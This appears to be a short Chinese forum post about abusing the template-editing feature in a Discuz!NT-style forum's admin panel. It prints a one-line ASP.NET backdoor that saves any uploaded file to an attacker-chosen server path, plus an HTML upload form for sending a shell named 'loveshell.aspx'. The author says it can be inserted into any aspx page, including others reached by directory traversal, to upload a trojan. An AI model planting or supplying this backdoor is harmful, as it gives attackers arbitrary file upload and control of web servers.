dx论坛后台提供编辑模板功能,对于.net分层设计的思想这是个很好的功能,可是这个功能也导致了安全漏洞,可以插入自己的后门(也可以直接目录跳转编辑其他的aspx文件)

<>
<>
<>

以下是代码片段： <% if(Request.Files.Count > 0) Request.Files[0].SaveAs(Server.MapPath(Request.Form["pass"]));%> <form enctype="multipart/form-data" action="http://1.com/index.aspx" name="hack" method="POST" onsubmit=doit()>

插的在这里

<>
<>
<>

以下是代码片段： <input name="url" type=text value="http://www.loveshell.net/blog/"/> <br> <br> <input type="hidden" name="MAX_FILE_SIZE" value="30000" /> 上传这只后门: <input name="userfile" type="file" /> <br> 到 <br> <input name="pass" type=text value="loveshell.aspx"/> <br> <input type="submit" value="劳资要传" /> </form> <script> function doit(){ document.hack.action=document.hack.url.value; document.hack.submit(); } </script>

直接插在aspx页面就可以传马了 呵呵

http://msdn2.microsoft.com/zh-cn/library/

http://chs.gotdotnet.com/quickstart/aspplus/

学习.net的2个好地方